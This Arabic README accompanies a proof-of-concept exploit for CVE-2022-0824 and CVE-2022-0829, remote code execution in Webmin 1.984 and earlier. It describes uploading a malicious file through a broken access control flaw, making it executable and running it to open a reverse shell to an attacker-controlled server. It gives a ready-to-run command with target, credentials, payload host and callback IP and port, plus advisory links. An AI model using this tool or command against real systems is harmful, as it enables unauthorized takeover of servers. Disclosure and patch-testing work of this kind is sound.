
إثبات المفهوم للاستغلال لـ CVE-2022-0824
RCE في Webmin <= 1.984
CVE-2022-0824 و CVE-2022-0829
يستغل هذا ثغرة BAC في Webmin لرفع ملف ضار، وتغيير صلاحيات الملف، وتنفيذ الملف. الملف، الذي تم إنشاؤه في الدالة makePayload، هو شل عكسي يعود إلى خادم يتحكم به المهاجم.
go run cve-2022-0824.go -t "https://172.16.177.132:10000" -c "username:password" -sl 172.16.177.1:8999 -s 172.16.177.1 -p 4444
t -> عنوان الهدف
c -> بيانات الدخول لـ Webmin
sl -> عنوان IP للخادم المحلي والمنفذ لاستضافة الحمولة
s -> عنوان IP للاستدعاء العكسي
p -> منفذ الاستدعاء العكسي
https://www.webmin.com/security.html
https://huntr.dev/bounties/d0049a96-de90-4b1a-9111-94de1044f295/
https://nvd.nist.gov/vuln/detail/CVE-2022-0824